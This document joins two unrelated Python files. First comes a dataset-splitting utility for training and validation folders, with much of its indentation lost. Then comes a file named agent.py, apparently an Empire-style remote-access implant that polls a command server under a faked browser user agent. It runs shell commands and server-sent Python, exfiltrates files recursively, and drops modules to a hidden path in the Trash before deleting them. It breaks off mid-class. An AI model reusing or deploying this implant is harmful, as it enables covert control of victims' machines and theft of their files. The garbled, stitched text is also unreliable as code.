# Flips value in 'calculate_threshold_automatically'.
def arg_calculate_threshold(next_arg):
global calculate_threshold_automatically
calculate_threshold_automatically = not calculate_threshold_automatically
return False
# Sets a name for the output categories
def arg_category(next_arg):
global categories
categories = next_arg.split(',')
return True
# Dict mapping the short forms of flags to the long ones.
char_arg_map = {
# Short form | Long form
'C': 'calculate-thresholds',
'e': 'exclude',
'D': 'duplicate',
'r': 'ratio',
's': 'source',
'd': 'destination',
'S': 'symlink',
'c': 'categories',
'h': 'help'}
# Maps the long name of a flag to an argument function
arg_dict = {
# Key | Function
'calculate-thresholds': arg_calculate_threshold,
'exclude': arg_exclude_amount,
'duplicate': arg_duplicate_amount,
'ratio': arg_ratio,
'source': arg_source,
'destination': arg_destination,
'symlink': arg_symlink,
'categories': arg_category,
'help': arg_help, }
# Converts single char arguments into a full argument and calls
# the processing function.
def process_1char_arg(char, next_arg):
try:
# return process_arg(char_arg_map.get(char), next_arg)
return arg_dict[char_arg_map[char]](next_arg)
except Exception as e:
log(f'\nInvalid single dash argument was given:\n\t{e}', 'error')
# Processes the command line arguments.
def process_commands():
    if len(sys.argv) <= 1:
        return
    # Set to True when a flag requires an additional argument after it.
    skip = False
    for arg in range(len(sys.argv)):
        if skip:
            skip = False
            continue
if (sys.argv[arg][0] == '-'):
next_arg = ''
if arg + 1 < len(sys.argv):
try:
next_arg = sys.argv[arg + 1]
except:
pass
# Handling 'one dash per one letter' syntax.
# This will permit passing one additional parameter
if len(sys.argv[arg]) == 2:
skip = process_1char_arg(sys.argv[arg][1], next_arg)
# Long arguments
elif len(sys.argv[arg]) > 3:
# Handling 'double dash, whole word' syntax.
# This will permit passing additional parameters
if sys.argv[arg][1] == '-':
skip = arg_dict[sys.argv[arg][2:]](next_arg)
else:
# Consider the possibility of a default argument
pass
'''
# This function prompts the user for setting up individual values.
def prompt(ratio=None, source=None, destination=None):
# Getting the ratio
if ratio == None:
temp = input('Input ratio [TRAINING, VALIDATION]: ')\
.replace(' ', '').split(',')
ratio = []
for i in temp:
try:
ratio.append(float(i))
except:
log('Not a FLOAT!', 'error')
ratio = None
if len(ratio) != len(categories) or len(ratio) != len(categories)-1:
ratio = None
else:
log('all fine', 'warning')
# If the input has a wrong format.
if ratio == None:
log('Too few arguments or wrong formating!', 'error')
# Recursively call this function to get a new input.
return prompt(ratio, source, destination)
# Getting the source path.
if source == None:
source = pathlib.Path(input('Path to the source dir: '))
if not os.path.isdir(source):
source = None
return prompt(ratio, source, destination)
# Getting the destination path.
if destination == None:
destination = pathlib.Path(input('Path to the destination dir: '))
if not os.path.isdir(source):
source = None
return prompt(ratio, source, destination)
return ratio, source, destination
'''
# Checks if the values in the config file make sense.
def check_validity_of_configuration():
global ratio, source, destination
# Calculating the last number of the ratio, in case the user was lazy.
if len(ratio) == len(categories) - 1:
ratio.append(1-sum(ratio))
elif len(ratio) != len(categories):
stop('Mismatch between the amount of categories and ratio')
if source == None:
stop('Default source path is not set (use -h for help).')
elif type(source) == str:
source = pathlib.Path(source)
if destination == None:
stop('Default destination path is not set (use -h for help).')
elif type(destination) == str:
destination = pathlib.Path(destination)
def log_info():
log(f'Sourcing dataset from {os.path.abspath(source)}.')
log(f'Making a new {"linked" if do_symlink else "copied"} dataset at '
+ f'{os.path.abspath(destination)}.')
log('', start='', hide_box=True)
log(f'The dataset will be split according to the following:')
for i, category in enumerate(categories):
log(f'{i}. {category}:\t{ratio[i]}')
log('', start='', hide_box=True)
# Explores the directories and maps the file tree.
def map_dir():
global source_dirs, source_files, source, sub_acc, sub_avg, \
calculate_threshold_automatically, class_duplicate_amount, \
class_exclude_amount
# Obtain directory listing.
source_dirs = os.listdir(source)
new_source_dirs = []
# Puts all files into a table 'source_files'.
dir_pointer = -1
for i in range(len(source_dirs)):
# Making sure all the 'file objects' lead to a dir and not some random
# file in the 'source' dir.
if os.path.isdir(source.joinpath(source_dirs[i])):
# Adding a new list for each subdir that will contain it's files.
temp_source_files = []
dir_pointer += 1
# At the same time I am building a new source dir list that
# only contains actual directories. Its indexes will match
# the 'source_files' table.
for j in os.listdir(source.joinpath(source_dirs[i])):
# Making sure only files get added this time.
if os.path.isfile(source.joinpath(source_dirs[i]).joinpath(j)):
temp_source_files.append(j)
# Actually adding the dir & files only when there are files in it.
if len(temp_source_files) != 0:
source_files.append(temp_source_files)
new_source_dirs.append(source_dirs[i])
    # Quit if there are no class directories to work with.
if len(new_source_dirs) == 0:
stop('The source directory contains no subdirectories.')
source_dirs = new_source_dirs
    # Calculating the total amount of files.
total_sum = 0
for i, directories in enumerate(source_dirs):
total_sum += len(source_files[i])
average = total_sum / len(source_files)
# Automatic calculation of the thresholds for duplicating and excluding
# dataset classes based on the amount of samples provided.
if calculate_threshold_automatically:
if class_duplicate_amount == 0:
class_duplicate_amount = total_sum / len(source_files)
if class_exclude_amount == 0:
class_exclude_amount = class_duplicate_amount/3*2
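    # Worked example (hypothetical numbers): with classes of 100, 50 and 30
    # samples, total_sum is 180, so class_duplicate_amount = 180 / 3 = 60
    # and class_exclude_amount = 60 / 3 * 2 = 40; the 30-sample class gets
    # excluded, the 50-sample class duplicated (multiplier 60/50 = 1.2) and
    # the 100-sample class transferred as-is.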
    # Communicating the information about the thresholds.
log(
f'The thresholds have been '
+ f'{"calculated" if calculate_threshold_automatically else "set"}'
+ ' to the following:')
log(f'Threshold for duplicating dataset is {class_duplicate_amount}.')
log(f'Threshold for excluding dataset is {class_exclude_amount}.')
    # Computing the multiplier of amounts of files needed to transfer for
    # every class according to the thresholds.
    for i, directories in enumerate(source_dirs):
if class_exclude_amount != 0 \
and len(source_files[i]) < class_exclude_amount:
sub_acc.append(i)
amounts.append(0)
elif class_duplicate_amount != 0 \
and len(source_files[i]) < class_duplicate_amount:
sub_avg.append(i)
amounts.append(class_duplicate_amount / len(source_files[i]))
else:
amounts.append(1)
# Creates directory structure at the new location.
def make_dirs(destination, dir_list):
log('Creating directory structure.')
# Creating the root directory of the dataset.
try:
os.mkdir(destination)
log('Destination directory created.')
except FileExistsError:
pass
    for i in dir_list:
        try:
            os.mkdir(destination.joinpath(i))
        except FileExistsError:
            pass
        except Exception:
            stop(f'Couldn\'t create directory for {i}!')
        # Making dirs for the individual classes inside each category dir
        # (nested so that `i` still names the current category).
        for index, directory in enumerate(source_dirs):
            # Skip excluded datasets.
            if index in sub_acc:
                continue
            # Creating the class directories.
            try:
                os.mkdir(destination.joinpath(i).joinpath(directory))
            except FileExistsError:
                pass
            except Exception:
                stop(f'Couldn\'t create directory for {directory} in {i}!')
# Forwards creating a single file to the appropriate function.
def create(src, dest):
if do_symlink:
# Create a symbolic link
try:
os.symlink(os.path.abspath(src), dest)
except FileExistsError as e:
pass
except OSError as e:
stop(f'An OS error has occurred: "{e}." !')
else:
# Make a copy of the file
try:
copyfile(src, dest)
except FileExistsError as e:
log(f'Cannot copy file {src}.', 'error')
# Populates a single dir with samples.
def make_dataset_dirs(path, destination_name, occurred, index, amount):
global progress_file
progress = 0
while True:
for i in range(occurred[0], occurred[1]):
if progress >= amount:
return
create(
path.joinpath(source_files[index][i]),
destination.joinpath(destination_name, source_dirs[index],
f'{progress}-{source_files[index][i]}'))
progress_file += 1
progress += 1
# Initiates the population of all dirs of a one class with samples.
def make_dataset(index):
global ratio
dataset_path_src = source.joinpath(source_dirs[index])
ranges = [0]
# Computes the real ranges based on the amount of samples and ratio.
for i, value in enumerate(ratio):
ranges.append(
ranges[len(ranges)-1] + int(len(source_files[index]) * value))
make_dataset_dirs(
dataset_path_src, categories[i], [ranges[i], ranges[i+1]],
index, (ranges[i+1] - ranges[i]) * amounts[index])
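# Worked example (hypothetical numbers) for make_dataset: with
# ratio [0.8, 0.2] and a class of 100 files, ranges grows to [0, 80, 100],
# so files 0-79 populate the first category dir and files 80-99 the second,
# each count scaled by amounts[index].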
# Prints a list of the classes with the amounts of samples and their standing
# according to the threshold.
def print_dirs():
global class_duplicate_amount, class_exclude_amount
total_sum = 0
for i, dir in enumerate(source_dirs):
total_sum += len(source_files[i])
average = total_sum / len(source_files)
log(f'The average amount of files is {int(average)}.\n')
log(f'List of directories:\n\t', end='')
for i, dir in enumerate(source_dirs):
log(f'{dir}\t\t\thas {len(source_files[i])} samples', end='')
if len(source_files[i]) < class_exclude_amount:
log(' (excluding)', start='', hide_box=True)
elif len(source_files[i]) < class_duplicate_amount:
log(' (duplicating)', start='', hide_box=True)
else:
log('', start='', hide_box=True)
log('', hide_box=True, end='\t')
log('\n' * 2, start='', end='', hide_box=True)
log(
f'There are {len(source_dirs)-len(sub_acc)-len(sub_avg)}'
        + ' healthy datasets.')
    log(f'There are {len(sub_avg)} classes that are below average.')
    log(
        f'There are {len(sub_acc)} classes that have an insufficient amount'
        + ' of samples.\n')
# A function that displays the progress bar and also prints some other things.
# It is meant to run in a separate thread.
def progress_bar():
dirs = len(source_dirs)
    # Printing in Python is inconsistent when doing a lot of processing,
    # therefore I have to print the directory listing in a separate thread.
files_total = 0
for i, obj in enumerate(source_files):
files_total += len(obj) * amounts[i]
log(f'Total files found: {files_total}.')
log('\n', start='', hide_box=True)
# Showing and updating the progress bar.
while not thread_stop:
# Computing the current percentage of progress.
percentage_class = float(progress_class) / len(source_files) * 100
percentage_file = float(progress_file) / files_total * 100
log(
f'{"Linking" if do_symlink else "Copying"} new dataset'
+ f' structure at {destination}')
# Preparing the string that will be printed.
string = f'\t[~] Class progress\t[{"█" * (int(percentage_class))}'\
+ f'{" " * (100 - int(percentage_class))}]'\
+ f'{int(percentage_class)}%'\
+ f' - {int(progress_class)}/{len(source_files)}'\
+ f' ({source_dirs[progress_class-1]})\n'
string += f'\t[~] File progress\t[{"█" * (int(percentage_file))}'\
+ f'{" " * (100 - int(percentage_file))}]'\
+ f'{int(percentage_file)}% -'\
+ f' {int(progress_file)}/{files_total}\n'
log(string, end='', start='', hide_box=True)
# Giving the CPU a break before redrawing.
time.sleep(0.01)
# Putting the cursor three lines up.
sys.stdout.write("\033[F" * 3)
    log(f'Finished formatting dataset at \'{os.path.abspath(destination)}\'.'
+ ' '*20)
def main():
global source_dirs, progress_class, thread_stop
# Processes command line arguments.
process_commands()
# Making sure all the config makes sense.
check_validity_of_configuration()
# Greeter banner.
banner()
# Printing a summary of configuration.
log_info()
# Mapping files structure of the source dir.
log('Mapping directories...\n')
map_dir()
# Prints all the directories with the amount of samples in them.
print_dirs()
# Display the progress bar.
prog_bar = threading.Thread(target=progress_bar)
prog_bar.start()
# Create the directory structure.
make_dirs(destination, categories)
# Copy files into the new dirs.
for i in range(len(source_dirs)):
make_dataset(i)
progress_class += 1
# Stopping the progress bar.
thread_stop = True
prog_bar.join()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
stop('A KEYBOARD INTERRUPTION')
|
agent.py
|
import struct
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import zlib
import threading
import http.server
import zipfile
import io
import importlib.util
import types
import re
import shutil
import pwd
import socket
import math
import stat
import grp
import numbers
from os.path import expanduser
from io import StringIO
from threading import Thread
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
# 'server' is expected to be patched in by the stager, like sessionID below
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
# killDate form -> "MO/DAY/YEAR"
killDate = 'REPLACE_KILLDATE'
# workingHours form -> "9:00-17:00"
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
        if headerKey.lower() == "cookie":
            if 'Cookie' in headers:
                headers['Cookie'] = "%s;%s" %(headers['Cookie'], headerValue)
            else:
                headers['Cookie'] = headerValue
        else:
            headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
REPLACE_COMMS
################################################
#
# encryption methods
#
################################################
def decode_routing_packet(data):
"""
Parse ALL routing packets and only process the ones applicable
to this agent.
"""
# returns {sessionID : (language, meta, additional, [encData]), ...}
packets = parse_routing_packet(stagingKey, data)
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
# if meta == 'SERVER_RESPONSE':
process_tasking(encData)
else:
# TODO: how to handle forwarding on other agent routing packets?
pass
def build_response_packet(taskingID, packetData, resultID=0):
"""
Build a task packet for an agent.
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
    +------+--------------------+----------+---------+--------+-----------+
    | Type | total # of packets | packet # | task ID | Length | task data |
    +------+--------------------+----------+---------+--------+-----------+
    |  2   |         2          |    2     |    2    |   4    | <Length>  |
    +------+--------------------+----------+---------+--------+-----------+
"""
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if(isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
        else:
            packetData = base64.b64encode(packetData)
        # b64encode output is already padded; keep the padding bytes-safe
        if len(packetData) % 4:
            packetData += b'=' * (4 - len(packetData) % 4)
length = struct.pack('=L',len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
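# A minimal sketch of what build_response_packet produces (hypothetical
# values): build_response_packet(40, "uid=0", resultID=7) returns
# struct.pack('=HHHHL', 40, 1, 1, 7, 8) + b'dWlkPTA=', i.e. a 12-byte
# header followed by the base64-encoded result data.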
def parse_task_packet(packet, offset=0):
"""
Parse a result packet-
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
    +------+--------------------+----------+---------+--------+-----------+
    | Type | total # of packets | packet # | task ID | Length | task data |
    +------+--------------------+----------+---------+--------+-----------+
    |  2   |         2          |    2     |    2    |   4    | <Length>  |
    +------+--------------------+----------+---------+--------+-----------+
    Returns a tuple with (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
"""
# print "parse_task_packet"
if(isinstance(packet, str)):
packet = packet.encode('UTF-8')
try:
packetType = struct.unpack('=H', packet[0+offset:2+offset])[0]
totalPacket = struct.unpack('=H', packet[2+offset:4+offset])[0]
packetNum = struct.unpack('=H', packet[4+offset:6+offset])[0]
resultID = struct.unpack('=H', packet[6+offset:8+offset])[0]
length = struct.unpack('=L', packet[8+offset:12+offset])[0]
packetData = packet[12+offset:12+offset+length]
remainingData = packet[12+offset+length:]
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:",e)
return (None, None, None, None, None, None, None)
def process_tasking(data):
    # processes an encrypted data packet:
    #   - decrypts/verifies the response to get the tasking packets
    #   - extracts the packets and processes each
    global missedCheckins
    try:
        # aes_decrypt_and_verify is in stager.py
        tasking = aes_decrypt_and_verify(key, data)
        (packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
        # if we get to this point, we have a legit tasking so reset missedCheckins
        missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking, offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
# send_message() is patched in from the listener module
send_message(resultPackets)
except Exception as e:
# print "processTasking exception:",e
pass
def process_job_tasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = ""
if result:
resultPackets += result
# send packets
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:",e)
pass
def process_packet(packetType, data, resultID):
if(isinstance(data, bytes)):
data = data.decode('UTF-8')
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
# agent exit
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 40:
# run a command
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID))
elif packetType == 41:
# file download
objPath = os.path.abspath(data)
fileList = []
        if not os.path.exists(objPath):
            send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
            return None
        if not os.path.isdir(objPath):
            fileList.append(objPath)
        else:
            # recursive dir listing
            for folder, subs, files in os.walk(objPath):
                for filename in files:
                    filePath = os.path.join(folder, filename)
                    # don't care about symlinks
                    if not os.path.islink(filePath):
                        fileList.append(filePath)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
                encodedPart = get_file_part(filePath, offset=offset, b64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
partData = "%s|%s|%s|%s" %(partIndex, filePath, size, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1,jitter)
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(0, "[!] WARNING: File upload failed crc32 check during decompressing!.", resultID))
send_message(build_response_packet(0, "[!] HEADER: Start crc32: %s -- Received crc32: %s -- Crc32 pass: %s!." %(dec_data['header_crc32'],dec_data['dec_crc32'],dec_data['crc32_check']), resultID))
f = open(filePath, 'ab')
f.write(dec_data['data'])
f.close()
send_message(build_response_packet(42, "[*] Upload of %s successful" %(filePath), resultID))
except Exception as e:
            send_message(build_response_packet(0, "[!] Error in writing file %s during upload: %s" %(filePath, str(e)), resultID))
elif packetType == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" %(x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
send_message(build_response_packet(0, "[*] Job thread stoped!", resultID))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" %(data), resultID)
elif packetType == 100:
        # dynamic code execution, wait for output, don't save output
try:
buffer = StringIO()
sys.stdout = buffer
            code_obj = compile(data, '<string>', 'exec')
            exec(code_obj, globals())
            sys.stdout = sys.__stdout__
            results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" %(e, errorData), resultID)
elif packetType == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
c = compress()
start_crc32 = c.crc32_data(buffer.getvalue())
comp_data = c.comp_data(buffer.getvalue())
encodedPart = c.build_header(comp_data, start_crc32)
            encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
            send_message(build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart, resultID))
except Exception as e:
# Also return partial code that has been executed
errorData = str(buffer.getvalue())
send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID))
elif packetType == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" %(implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" %(implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "\n[*] Module path was properly removed: %s" %(implantPath)
except Exception as e:
print("error removing module filed: %s" %(e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0, "error executing specified Python data: %s \nError removing module file, please verify path: %s" %(e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" %(e), resultID))
elif packetType == 110:
start_job(data)
        send_message(build_response_packet(110, "job %s started" %(len(jobs)-1), resultID))
elif packetType == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif packetType == 121:
#base64 decode the script and execute
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID))
elif packetType == 122:
#base64 decode and decompress the data
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
        except Exception as e:
            send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
            return None
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
#view loaded modules
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----"+key+"----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----"+repoName+"----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
#remove module
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
send_message(build_response_packet(124, "Successfully remove repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
send_message(build_response_packet(0, "invalid tasking ID: %s" %(taskingID), resultID))
def old_div(a, b):
"""
Equivalent to ``a / b`` on Python 2 without ``from __future__ import
division``.
"""
if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
return a // b
else:
return a / b
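# e.g. old_div(7, 2) == 3 (floor division for two integers), while
# old_div(7.0, 2) == 3.5 (true division once either operand is a float).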
################################################
#
# Custom Import Hook
# #adapted from https://github.com/sulinx/remote_importer
#
################################################
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
#check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
        #Error out if we can't find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
            raise IOError('Path %r does not start with module name %r' % (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
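# Hypothetical usage sketch of the hook machinery above: after a type-122
# task stores a zipfile under moduleRepo['tools'] and install_hook('tools')
# registers a CFinder on sys.meta_path, a plain `import sometool` resolves
# sometool.py (or sometool/__init__.py) out of the in-memory zip;
# remove_hook('tools') detaches the finder again.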
################################################
#
# misc methods
#
################################################
class compress(object):
'''
    Base class for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def comp_data(self, data, cvalue=COMP_RATIO):
'''
Takes in a string and computes
the comp obj.
data = string wanting compression
        cvalue = 0-9 comp value (default 9)
'''
cdata = zlib.compress(data,cvalue)
return cdata
def crc32_data(self, data):
'''
Takes in a string and computes crc32 value.
data = string before compression
returns:
            CRC32 value of the data as an int
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I",crc)
built_data = header + data
return built_data
class decompress(object):
'''
    Base class for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
            dict with crc32 check and dec data string
            ex. {"header_crc32": 1234, "dec_crc32": 1234, "crc32_check": True, "data": "-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return { "header_crc32" : comp_crc32, "dec_crc32" : dec_crc32, "crc32_check" : crc32, "data" : dec_data }
else:
dec_data = zlib.decompress(data)
return dec_data
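# Round-trip sketch for the compress/decompress helpers above
# (illustrative only; not part of the agent's tasking flow):
#   c = compress()
#   raw = b"some tasking output"
#   packed = c.build_header(c.comp_data(raw), c.crc32_data(raw))
#   out = decompress().dec_data(packed, cheader=True)
#   assert out['crc32_check'] and out['data'] == raw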
def agent_exit():
# exit for proper job / thread cleanup
if len(jobs) > 0:
try:
            for job in jobs[:]:
                job.kill()
                jobs.remove(job)
except:
# die hard if thread kill fails
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n'+padding).join(lines.split('\n'))
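# e.g. indent('a\nb') == '    a\n    b' (each line gets a 4-space prefix)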
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
    def __init__(self, group=None, target=None, name=None,
